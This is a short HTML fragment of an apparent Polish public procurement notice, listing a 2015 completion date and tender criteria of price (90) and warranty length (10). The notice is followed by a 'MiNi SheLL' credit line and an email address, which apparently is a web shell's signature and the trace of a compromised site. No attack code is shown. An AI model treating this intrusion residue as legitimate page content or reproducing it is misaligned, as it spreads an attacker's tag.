<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja na roboty i materiały pkt. 1 za 3 lata , pkt. 5 za 4 lata , 10 pkt. za 5 lat - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com